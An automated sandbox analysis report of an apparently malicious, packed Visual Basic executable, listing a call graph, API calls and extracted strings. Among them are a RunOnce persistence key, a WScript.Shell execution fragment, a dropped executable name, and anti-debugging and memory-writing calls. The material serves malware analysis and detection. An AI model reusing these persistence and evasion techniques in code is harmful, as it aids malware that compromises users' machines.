__vbaObjSet 4530->4531 4532 40f279 __vbaNew2 4530->4532 4534 40f2df 4531->4534 4532->4531 4535 40f310 4534->4535 4536 40f2f0 __vbaHresultCheckObj 4534->4536 4537 40f320 __vbaNew2 4535->4537 4538 40f33b __vbaObjSet 4535->4538 4536->4535 4537->4538 4540 40f389 4538->4540 4541 40f3ba 4540->4541 4542 40f39a __vbaHresultCheckObj 4540->4542 4543 40f3e5 __vbaObjSet 4541->4543 4544 40f3ca __vbaNew2 4541->4544 4542->4541 4546 40f436 4543->4546 4544->4543 4547 40f447 __vbaHresultCheckObj 4546->4547 4548 40f46a 4546->4548 4547->4548 4549 40f495 __vbaObjSet 4548->4549 4550 40f47a __vbaNew2 4548->4550 4552 40f4e6 4549->4552 4550->4549 4553 40f4f7 __vbaHresultCheckObj 4552->4553 4554 40f51a 4552->4554 4555 40f521 __vbaLateIdCallLd 4553->4555 4554->4555 4556 40f543 __vbaNew2 4555->4556 4557 40f55e __vbaObjSet 4555->4557 4556->4557 4559 40f5af 4557->4559 4560 40f5c0 __vbaHresultCheckObj 4559->4560 4561 40f5e3 4559->4561 4560->4561 4562 40f5f3 __vbaNew2 4561->4562 4563 40f60e __vbaObjSet 4561->4563 4562->4563 4565 40f65f 4563->4565 4566 40f670 __vbaHresultCheckObj 4565->4566 4567 40f693 4565->4567 4568 40f69a __vbaStrVarMove __vbaStrMove __vbaChkstk 4566->4568 4567->4568 4569 40f755 4568->4569 4570 40f784 4569->4570 4571 40f764 __vbaHresultCheckObj 4569->4571 4572 40f78b __vbaFreeStr __vbaFreeObjList __vbaFreeVarList 4570->4572 4571->4572 4573 40f811 4572->4573 4574 40f840 4573->4574 4575 40f820 __vbaHresultCheckObj 4573->4575 4576 40f860 __vbaNew2 4574->4576 4577 40f87b __vbaObjSet 4574->4577 4575->4574 4576->4577 4579 40f8c9 4577->4579 4580 40f8da __vbaHresultCheckObj 4579->4580 4581 40f8fd 4579->4581 4580->4581 4582 40f928 __vbaObjSet 4581->4582 4583 40f90d __vbaNew2 4581->4583 4585 40f979 4582->4585 4583->4582 4586 40f98a __vbaHresultCheckObj 4585->4586 4587 40f9ad 4585->4587 4586->4587 4588 40f9d8 __vbaObjSet 4587->4588 4589 40f9bd __vbaNew2 4587->4589 4591 40fa23 4588->4591 4589->4588 4592 40fa54 4591->4592 4593 40fa34 __vbaHresultCheckObj 4591->4593 4594 40fa5b __vbaChkstk 4592->4594 4593->4594 4595 40fabb 4594->4595 4596 40faea 4595->4596 4597 40faca __vbaHresultCheckObj 4595->4597 4598 40faf1 __vbaFreeObjList __vbaFreeVar 4596->4598 4597->4598 4599 40fb43 __vbaObjSet 4598->4599 4600 40fb28 __vbaNew2 4598->4600 4602 40fb91 4599->4602 4600->4599 4603 40fba2 __vbaHresultCheckObj 4602->4603 4604 40fbc5 4602->4604 4603->4604 4605 40fbf0 __vbaObjSet 4604->4605 4606 40fbd5 __vbaNew2 4604->4606 4608 40fc3b 4605->4608 4606->4605 4609 40fc6c 4608->4609 4610 40fc4c __vbaHresultCheckObj 4608->4610 4611 40fc97 __vbaObjSet 4609->4611 4612 40fc7c __vbaNew2 4609->4612 4610->4609 4614 40fce5 4611->4614 4612->4611 4615 40fd16 4614->4615 4616 40fcf6 __vbaHresultCheckObj 4614->4616 4617 40fd41 __vbaObjSet 4615->4617 4618 40fd26 __vbaNew2 4615->4618 4616->4615 4620 40fd92 4617->4620 4618->4617 4621 40fda3 __vbaHresultCheckObj 4620->4621 4622 40fdc6 4620->4622 4621->4622 4623 40fdf1 __vbaObjSet 4622->4623 4624 40fdd6 __vbaNew2 4622->4624 4626 40fe3f 4623->4626 4624->4623 4627 40fe50 __vbaHresultCheckObj 4626->4627 4628 40fe73 4626->4628 4629 40fe7a __vbaChkstk 4627->4629 4628->4629 4630 40ff38 4629->4630 4631 40ff67 4630->4631 4632 40ff47 __vbaHresultCheckObj 4630->4632 4633 40ff6e __vbaVarMove __vbaFreeStr __vbaFreeObjList __vbaFreeVarList __vbaStrCopy 4631->4633 4632->4633 4634 410002 __vbaFreeStr 4633->4634 4635 410023 __vbaNew2 4634->4635 4636 41003e __vbaObjSet 4634->4636 4635->4636 4638 41008c 4636->4638 4639 4100c0 4638->4639 4640 41009d __vbaHresultCheckObj 4638->4640 4641 4100c7 __vbaLateIdCallLd 4639->4641 4640->4641 4642 410104 __vbaObjSet 4641->4642 4643 4100e9 __vbaNew2 4641->4643 4645 410155 4642->4645 4643->4642 4646 410166 __vbaHresultCheckObj 4645->4646 4647 410189 4645->4647 4646->4647 4648 4101b4 __vbaObjSet 4647->4648 4649 410199 __vbaNew2 4647->4649 4651 410205 4648->4651 4649->4648 4652 410216 __vbaHresultCheckObj 4651->4652 4653 410239 4651->4653 4652->4653 4654 410264 __vbaObjSet 4653->4654 4655 410249 __vbaNew2 4653->4655 4657 4102b2 4654->4657 4655->4654 4658 4102e3 4657->4658 4659 4102c3 __vbaHresultCheckObj 4657->4659 4660 4102f3 __vbaNew2 4658->4660 4661 41030e __vbaObjSet 4658->4661 4659->4658 4660->4661 4663 41035f 4661->4663 4664 410370 __vbaHresultCheckObj 4663->4664 4665 410393 4663->4665 4666 41039a __vbaLateIdCallLd 4664->4666 4665->4666 4667 4103d7 __vbaObjSet 4666->4667 4668 4103bc __vbaNew2 4666->4668 4670 410428 4667->4670 4668->4667 4671 410439 __vbaHresultCheckObj 4670->4671 4672 41045c 4670->4672 4673 410463 __vbaStrCopy __vbaI4Var __vbaI4Var 4671->4673 4672->4673 4674 4104f7 __vbaVarMove __vbaFreeStr __vbaFreeObjList __vbaFreeVarList 4673->4674 4675 410574 __vbaNew2 4674->4675 4676 41058f __vbaObjSet 4674->4676 4675->4676 4678 4105dd 4676->4678 4679 410611 4678->4679 4680 4105ee __vbaHresultCheckObj 4678->4680 4681 410621 __vbaNew2 4679->4681 4682 41063c __vbaObjSet 4679->4682 4680->4679 4681->4682 4684 41068d 4682->4684 4685 4106c1 4684->4685 4686 41069e __vbaHresultCheckObj 4684->4686 4687 4106d1 __vbaNew2 4685->4687 4688 4106ec __vbaObjSet 4685->4688 4686->4685 4687->4688 4690 41073a 4688->4690 4691 41076b 4690->4691 4692 41074b __vbaHresultCheckObj 4690->4692 4693 410772 __vbaChkstk __vbaChkstk __vbaChkstk 4691->4693 4692->4693 4694 410874 4693->4694 4695 4108a3 4694->4695 4696 410883 __vbaHresultCheckObj 4694->4696 4697 4108aa __vbaFreeObjList __vbaFreeVar 4695->4697 4696->4697 4698 4108f3 __vbaNew2 4697->4698 4699 41090e __vbaObjSet 4697->4699 4698->4699 4701 41095c 4699->4701 4702 410990 4701->4702 4703 41096d __vbaHresultCheckObj 4701->4703 4704 4109a0 __vbaNew2 4702->4704 4705 4109bb __vbaObjSet 4702->4705 4703->4702 4704->4705 4707 410a0c 4705->4707 4708 410a40 4707->4708 4709 410a1d __vbaHresultCheckObj 4707->4709 4710 410add 4708->4710 4711 410abd __vbaHresultCheckObj 4708->4711 4709->4708 4712 410ae4 __vbaFreeObjList __vbaFreeVar 4710->4712 4711->4712 4713 410b3a __vbaObjSet 4712->4713 4714 410b1f __vbaNew2 4712->4714 4716 410b85 4713->4716 4714->4713 4717 410bb6 4716->4717 4718 410b96 __vbaHresultCheckObj 4716->4718 4719 410be1 __vbaObjSet 4717->4719 4720 410bc6 __vbaNew2 4717->4720 4718->4717 4722 410c2f 4719->4722 4720->4719 4723 410c60 4722->4723 4724 410c40 __vbaHresultCheckObj 4722->4724 4725 410c67 __vbaStrCopy 4723->4725 4724->4725 4726 410ccd 4725->4726 4727 410cfc 4726->4727 4728 410cdc __vbaHresultCheckObj 4726->4728 4729 410d03 __vbaFreeStr __vbaFreeObjList __vbaOnError 4727->4729 4728->4729 4730 410d43 4729->4730 4731 410d54 __vbaHresultCheckObj 4730->4731 4732 410d74 4730->4732 4731->4732 4738 411bbe __vbaChkstk #644 4732->4738 4734 410da6 4739 4041a1 4734->4739 4738->4734 4740 404238 4739->4740 4740->4740 4741 40424a VirtualAlloc 4740->4741 4742 404383 4741->4742 5398 20a8fe0 5400 20a8ecb 5398->5400 5399 20a7c59 GetPEB 5401 20a90eb 5399->5401 5400->5399 5402 20a95a7 5401->5402 5403 20a958c OpenSCManagerA 5401->5403 5404 20a959b 5403->5404 5404->5404 4919 20a2c7b 4920 20a2c10 GetPEB 4919->4920 4929 20a2c76 4919->4929 4922 20a8ec1 2 API calls 4920->4922 4923 20a2c5f 4922->4923 4924 20a2c64 4923->4924 4927 20a2bf2 4923->4927 4925 20a8ec1 2 API calls 4924->4925 4925->4929 4926 20a2d8f GetPEB 4932 20a3e20 4926->4932 4928 20a2c10 3 API calls 4927->4928 4931 20a9702 4928->4931 4929->4926 4930 20a7c59 GetPEB 4930->4932 4932->4930 5053 20a62f8 5054 20a6303 GetLongPathNameW 5053->5054 5055 20a6294 5053->5055 5056 20a6514 5054->5056 4377 20a457e 4378 20a5075 4377->4378 4379 20a507c LdrInitializeThunk 4378->4379 4380 20a50e5 4378->4380 4381 20a837e 4382 20a6f5a 4381->4382 4383 20a8485 4381->4383 4384 20a70a8 LoadLibraryA 4382->4384 4387 20a7679 GetPEB 4382->4387 4408 20a8b16 NtProtectVirtualMemory 4383->4408 4386 20a70b3 4384->4386 4389 20a706a 4387->4389 4388 20a3cc1 4391 20a709b 4389->4391 4392 20a08f9 4389->4392 4393 20a7086 4389->4393 4390 20a84c3 4390->4388 4398 20a8832 4390->4398 4407 20a865d 4390->4407 4391->4384 4394 20a08d5 15 API calls 4392->4394 4395 20a7679 GetPEB 4393->4395 4396 20a08fe 4394->4396 4397 20a708c 4395->4397 4397->4391 4399 20a7679 GetPEB 4397->4399 4402 20a89a5 4398->4402 4403 20a8858 4398->4403 4399->4391 4401 20a8a03 4411 20a8b16 NtProtectVirtualMemory 4402->4411 4410 20a8b16 NtProtectVirtualMemory 4403->4410 4406 20a899f 4407->4388 4409 20a8b16 NtProtectVirtualMemory 4407->4409 4408->4390 4409->4388 4410->4406 4411->4401 4933 20a247e 4934 20a2418 4933->4934 4935 20a8ec1 2 API calls 4934->4935 4942 20a25b7 4934->4942 4935->4934 4936 20a291f GetPEB 4937 20a2940 4936->4937 4938 20a2ae1 4937->4938 4940 20a8ec1 2 API calls 4937->4940 4943 20a2aba 4937->4943 4939 20a2c10 3 API calls 4938->4939 4941 20a9702 4939->4941 4940->4937 4942->4936 4944 20a8ec1 2 API calls 4943->4944 4944->4938 5057 4116b5 __vbaChkstk 5058 411703 __vbaObjSet 5057->5058 5059 4116eb __vbaNew2 5057->5059 5061 411738 5058->5061 5059->5058 5062 411743 __vbaHresultCheckObj 5061->5062 5063 41175d 5061->5063 5064 411761 __vbaFreeObj 5062->5064 5063->5064 5065 41177a 5064->5065 5405 20a41fe 5406 20a41fa 5405->5406 5407 20a7679 GetPEB 5406->5407 5408 20a8078 5407->5408 4945 411437 __vbaChkstk 4946 411477 #536 __vbaStrMove __vbaFreeVar 4945->4946 4947 4114b0 __vbaFreeStr 4946->4947 5066 20a2af2 5067 20a2bf0 5066->5067 5068 20a2c10 3 API calls 5067->5068 5069 20a9702 5068->5069 5266 20a7d70 5267 20a6f5a 15 API calls 5266->5267 5268 20a7d84 5267->5268 5269 20a7679 GetPEB 5268->5269 5270 20a3cc1 5268->5270 5269->5270

                                      Executed Functions

                                      Function 020A0D52, Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 527COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 375 20a0d52-20a0d69 376 20a0d70-20a0d89 call 20a7243 375->376 379 20a806e-20a808a call 20a7679 call 20a8087 376->379 380 20a0d8f-20a0d94 376->380 395 20a808d-20a8097 379->395 380->379 381 20a0d9a-20a0d9f 380->381 381->379 383 20a0da5-20a0daa 381->383 383->379 385 20a0db0-20a0db6 383->385 387 20a0dbc-20a0dc4 385->387 388 20a32a6-20a32b8 call 20a833c 385->388 390 20a0dca-20a0dcf 387->390 391 20a0c15-20a0c1f 387->391 394 20a0dd1-20a0f08 call 20a4acd call 20a3cad call 20a422c call 20a6f5a call 20a8ec1 390->394 396 20a0c26-20a0c2c 391->396 419 20a11fe-20a128c call 20a6f5a * 2 call 20a8ec1 394->419 420 20a0f0e-20a1044 call 20a6f5a 394->420 395->395 398 20a8099-20a81ee call 20a80a5 395->398 396->394 399 20a0c32-20a0c34 396->399 406 20a0c34 call 20a0d52 399->406 408 20a0c39-20a0c3a 406->408 411 20a0c9e-20a0d51 408->411 412 20a0c3c-20a0c9d 408->412 411->375 412->411 419->379 443 20a1292-20a12a2 call 20a6b99 419->443 427 20a104a-20a1053 420->427 428 20a1045 call 20a8ec1 420->428 427->419 429 20a1059-20a1070 427->429 428->427 431 20a1076-20a109d call 20a7243 429->431 437 20a109f-20a10a4 431->437 438 20a10c0-20a10c7 431->438 437->379 440 20a10aa-20a10af 437->440 438->379 442 20a10cd-20a10d2 438->442 440->379 444 20a10b5-20a10ba 440->444 442->379 445 20a10d8-20a10dd 442->445 451 20a12a8 443->451 452 20a1402-20a144f 443->452 444->379 444->438 445->379 446 20a10e3-20a10eb 445->446 446->379 448 20a10f1-20a11f5 446->448 448->431 453 20a11f6-20a11fb 448->453 454 20a12b2-20a12bc call 20a32a6 451->454 458 20a1454-20a1462 452->458 453->419 459 20a12be-20a13c3 454->459 458->458 460 20a1464-20a1560 458->460 463 20a13c9-20a13ce 459->463 464 20a3cc1-20a3cc5 459->464 465 20a1562-20a1566 460->465 466 20a1577-20a157b 460->466 472 20a13fd 463->472 473 20a13d0-20a13fb call 20a1d90 call 20a6f07 call 20a1c07 463->473 469 20a3cc6-20a3cd7 464->469 467 20a1568-20a1570 call 20a1d90 465->467 468 20a1572 call 20a1f3a 465->468 470 20a179b-20a41c3 call 20a17a5 466->470 471 20a1581-20a158c call 20a1d90 466->471 467->466 467->468 468->466 469->469 478 20a3cd9-20a3cdb 469->478 471->470 487 20a1592-20a15e7 call 20a833c call 20a1a87 call 20a1fa7 471->487 477 20a3c9d-20a3caa TerminateProcess 472->477 473->472 487->464 497 20a15ed-20a15f9 487->497 497->470 498 20a5378-20a537e call 20a15fe 497->498 501 20a53a1-20a53af 498->501 502 20a5381-20a539c 498->502 504 20a53b1-20a5413 call 20a1f51 call 20a1d97 501->504 505 20a5416-20a542b 501->505 502->501 504->505 505->379
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: j@h$]:$iX
                                      • API String ID: 0-588690634
                                      • Opcode ID: 7165bc645bb0a4d0e1ca5414f510100a26532113cb44905fc3d6fe2a4159e8da
                                      • Instruction ID: 34ab61d7eb186fa65bc218d9d7122b8d205d331cbd6f979bffc56c7b00212959
                                      • Opcode Fuzzy Hash: 7165bc645bb0a4d0e1ca5414f510100a26532113cb44905fc3d6fe2a4159e8da
                                      • Instruction Fuzzy Hash: 2002BA709003466BEB321BF4CCA5BD8B777AF41314FD44268FE86571D1C7B9A8A0AB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A0BD7, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 481COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 520 20a0bd7-20a0c13 call 20a6f5a * 2 525 20a0c15-20a0c2c 520->525 527 20a0c32-20a0c3a call 20a0d52 525->527 528 20a0dd1-20a0f08 call 20a4acd call 20a3cad call 20a422c call 20a6f5a call 20a8ec1 525->528 535 20a0c9e-20a0d89 call 20a7243 527->535 536 20a0c3c-20a0c9d 527->536 555 20a11fe-20a128c call 20a6f5a * 2 call 20a8ec1 528->555 556 20a0f0e-20a1044 call 20a6f5a 528->556 548 20a806e-20a808a call 20a7679 call 20a8087 535->548 549 20a0d8f-20a0d94 535->549 536->535 574 20a808d-20a8097 548->574 549->548 551 20a0d9a-20a0d9f 549->551 551->548 554 20a0da5-20a0daa 551->554 554->548 558 20a0db0-20a0db6 554->558 555->548 593 20a1292-20a12a2 call 20a6b99 555->593 572 20a104a-20a1053 556->572 573 20a1045 call 20a8ec1 556->573 562 20a0dbc-20a0dc4 558->562 563 20a32a6-20a32b8 call 20a833c 558->563 562->525 567 20a0dca-20a0dcf 562->567 567->528 572->555 575 20a1059-20a1070 572->575 573->572 574->574 577 20a8099-20a81ee call 20a80a5 574->577 578 20a1076-20a109d call 20a7243 575->578 587 20a109f-20a10a4 578->587 588 20a10c0-20a10c7 578->588 587->548 590 20a10aa-20a10af 587->590 588->548 592 20a10cd-20a10d2 588->592 590->548 594 20a10b5-20a10ba 590->594 592->548 595 20a10d8-20a10dd 592->595 601 20a12a8 593->601 602 20a1402-20a144f 593->602 594->548 594->588 595->548 596 20a10e3-20a10eb 595->596 596->548 598 20a10f1-20a11f5 596->598 598->578 603 20a11f6-20a11fb 598->603 604 20a12b2-20a12bc call 20a32a6 601->604 608 20a1454-20a1462 602->608 603->555 609 20a12be-20a13c3 604->609 608->608 610 20a1464-20a1560 608->610 613 20a13c9-20a13ce 609->613 614 20a3cc1-20a3cc5 609->614 615 20a1562-20a1566 610->615 616 20a1577-20a157b 610->616 622 20a13fd-20a3caa TerminateProcess 613->622 623 20a13d0-20a13fb call 20a1d90 call 20a6f07 call 20a1c07 613->623 619 20a3cc6-20a3cd7 614->619 617 20a1568-20a1570 call 20a1d90 615->617 618 20a1572 call 20a1f3a 615->618 620 20a179b-20a41c3 call 20a17a5 616->620 621 20a1581-20a158c call 20a1d90 616->621 617->616 617->618 618->616 619->619 628 20a3cd9-20a3cdb 619->628 621->620 637 20a1592-20a15e7 call 20a833c call 20a1a87 call 20a1fa7 621->637 623->622 637->614 647 20a15ed-20a15f9 637->647 647->620 648 20a5378-20a537e call 20a15fe 647->648 651 20a53a1-20a53af 648->651 652 20a5381-20a539c 648->652 654 20a53b1-20a5413 call 20a1f51 call 20a1d97 651->654 655 20a5416-20a542b 651->655 652->651 654->655 655->548
                                      Strings
                                      • W = CreateObject("WScript.Shell")Set C = W.Exec (", xrefs: 020A5381
                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 020A53C6
                                      • \Internering2.exe, xrefs: 020A5406
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$W = CreateObject("WScript.Shell")Set C = W.Exec ("$\Internering2.exe
                                      • API String ID: 1029625771-867964101
                                      • Opcode ID: e05aab62bb3be44cf28252791593768de983d64d62cfd7530dda196b8a1eefed
                                      • Instruction ID: 90720e8a392e3bd954aa173c2c9f10ad8d9060fbbab9555233c238446cf64ad9
                                      • Opcode Fuzzy Hash: e05aab62bb3be44cf28252791593768de983d64d62cfd7530dda196b8a1eefed
                                      • Instruction Fuzzy Hash: 05F1F030D043864BDB3216F44CB57DCBBB77F42324FD842AAEC99471A2D7A598A0D752
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A34CD, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 242COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: j@h$]:$iX
                                      • API String ID: 0-588690634
                                      • Opcode ID: 148dd63ea7f608c0aa791e72579de84f4c6a8184696d79aa1afc4aff52aec32d
                                      • Instruction ID: 6f0f67b97e4557df1bd68ba69dfcb07f79b144ed54e85531d051caa1be51fa8d
                                      • Opcode Fuzzy Hash: 148dd63ea7f608c0aa791e72579de84f4c6a8184696d79aa1afc4aff52aec32d
                                      • Instruction Fuzzy Hash: 9F81897090468A6BEB220BB0CC957C4FB76BF01714F8411A8FE96471A1C7B66CF49BC1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A08D5, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • EnumWindows.USER32(020A08FE,?,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?), ref: 020A08E7
                                      • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349), ref: 020A0A7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: EnumInformationThreadWindows
                                      • String ID: 1.!T$Msi.dll
                                      • API String ID: 1954852945-1822015534
                                      • Opcode ID: f9c80b3dfd7aa95962c71d2c78de894e7ac0f912cb6256bc9ba11a4e262a0758
                                      • Instruction ID: 52d240596efc28cac5f5758ee0e32af238a5303dae35d7b8882b38d9db75075f
                                      • Opcode Fuzzy Hash: f9c80b3dfd7aa95962c71d2c78de894e7ac0f912cb6256bc9ba11a4e262a0758
                                      • Instruction Fuzzy Hash: 9E310874740309ABEB109FA48DF0BDE3AA3AF85354FA48229FD596B2C4CA70DC45D711
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A474B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 744 20a474b-20a4761 747 20a4abd-20a4ac8 744->747 748 20a4767-20a479c call 20a8ec1 744->748 753 20a51a2-20a51b0 call 20a0bd7 747->753 748->747 752 20a47a2-20a48d3 748->752 752->747 759 20a48d9-20a48ef 752->759 760 20a090f-20a0a93 call 20a6f5a call 20a3cde call 20a833c call 20a6f5a NtSetInformationThread call 20a3ff8 call 20a6f5a 759->760 761 20a48f5-20a4900 759->761 788 20a0a98-20a0bba 760->788 763 20a490a-20a4925 761->763 765 20a4931-20a4950 call 20a8ec1 763->765 766 20a4927-20a492d 763->766 765->747 772 20a4956-20a4960 765->772 766->765 774 20a496d-20a4ab6 call 20a8ec1 * 2 772->774 775 20a4962-20a496b 772->775 775->763 790 20a0bc1-20a0bc3 788->790 791 20a0bbc call 20a737f 788->791 790->788 792 20a0bc9-20a0bd2 790->792 791->790 792->753
                                      APIs
                                      • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349), ref: 020A0A7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID: 1.!T$Msi.dll
                                      • API String ID: 4046476035-1822015534
                                      • Opcode ID: 6c140333d961bdb831968f344efa957b945f94a06249c5de528568f671feccfe
                                      • Instruction ID: 7e7e5a79cbb102e2526ddb05b51b34084c116a27eb488fa62be2f43bc4d3eb82
                                      • Opcode Fuzzy Hash: 6c140333d961bdb831968f344efa957b945f94a06249c5de528568f671feccfe
                                      • Instruction Fuzzy Hash: 1A51E67468034AAAEF319EA4CCB1BEE36A6AF44344F948125FD4AAB1C0D771DD44EB14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A35EF, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • NtWriteVirtualMemory.NTDLL(?,?,?,00000000,?,68F644E8,?,68F644E4,00000000,68F644E8,00001000,00000040,?,?,?,68F644E4), ref: 020A399F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID: j@h$iX
                                      • API String ID: 3527976591-3508662898
                                      • Opcode ID: 14476d47d29c597bf2023ca5c5b61ec9c027f5a852d5ddd9561c6830c20ecc05
                                      • Instruction ID: 79d61f7fd8995380f365927a57d5c1c6b79200e4021d0d9e75e6c20fefbfb1b5
                                      • Opcode Fuzzy Hash: 14476d47d29c597bf2023ca5c5b61ec9c027f5a852d5ddd9561c6830c20ecc05
                                      • Instruction Fuzzy Hash: 8C5194B0240308BFFF759F50DC95BE93A66FF14304F948124FA85AA1D0D7B9A9D4AB84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A0917, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 825 20a0917-20a0919 826 20a091b-20a0a30 825->826 827 20a08ac 825->827 828 20a0a37-20a0a93 call 20a833c call 20a6f5a NtSetInformationThread call 20a3ff8 call 20a6f5a 826->828 829 20a0a32 call 20a3cde 826->829 838 20a0a98-20a0bba 828->838 829->828 840 20a0bc1-20a0bc3 838->840 841 20a0bbc call 20a737f 838->841 840->838 842 20a0bc9-20a51b0 call 20a0bd7 840->842 841->840
                                      APIs
                                        • Part of subcall function 020A6F5A: LoadLibraryA.KERNELBASE(?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719,00000000), ref: 020A70A8
                                      • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349), ref: 020A0A7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: InformationLibraryLoadThread
                                      • String ID: 1.!T$Msi.dll
                                      • API String ID: 543350213-1822015534
                                      • Opcode ID: fd8243844a7b373d72ba6221b58e2dc4c3e550b3e4d3283104d48990456af713
                                      • Instruction ID: 4dae0ecd3625190c073821b1ee2101c12eacd0cc327ebcfcb780df8a7ebb6d6f
                                      • Opcode Fuzzy Hash: fd8243844a7b373d72ba6221b58e2dc4c3e550b3e4d3283104d48990456af713
                                      • Instruction Fuzzy Hash: 1741E615D49AC703C21206F41CA53C0FFB73F52A28FC521EDADA603166D7626D7487D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A35E2, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • NtWriteVirtualMemory.NTDLL(?,?,?,00000000,?,68F644E8,?,68F644E4,00000000,68F644E8,00001000,00000040,?,?,?,68F644E4), ref: 020A399F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID: j@h$iX
                                      • API String ID: 3527976591-3508662898
                                      • Opcode ID: 998f84c450f3a1d155d426431ba1816ab9f3f9d662b19d60f8dd76f3dbb2fa33
                                      • Instruction ID: eba6202efc745783a77239a04f1780bab0c34a11b16aa4080e7aadcca0c45a69
                                      • Opcode Fuzzy Hash: 998f84c450f3a1d155d426431ba1816ab9f3f9d662b19d60f8dd76f3dbb2fa33
                                      • Instruction Fuzzy Hash: AF41B3B0640308AFFF769F50DCA5BE93656FB14304F948124FA85AA1D0D7B998C4BB84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A36D0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 188nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 879 20a36d0-20a36d9 880 20a36db-20a37d2 879->880 881 20a366c-20a369f 879->881 884 20a37d4-20a381c call 20a8ec1 880->884 882 20a36a7-20a36cb 881->882 883 20a36a2 call 20a8ec1 881->883 882->884 883->882 890 20a381e-20a3821 884->890 891 20a3827-20a39a5 call 20a737f call 20a3cc1 NtWriteVirtualMemory 884->891 890->891 899 20a39a7-20a3a11 call 20a8ec1 * 3 891->899
                                      APIs
                                      • NtWriteVirtualMemory.NTDLL(?,?,?,00000000,?,68F644E8,?,68F644E4,00000000,68F644E8,00001000,00000040,?,?,?,68F644E4), ref: 020A399F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
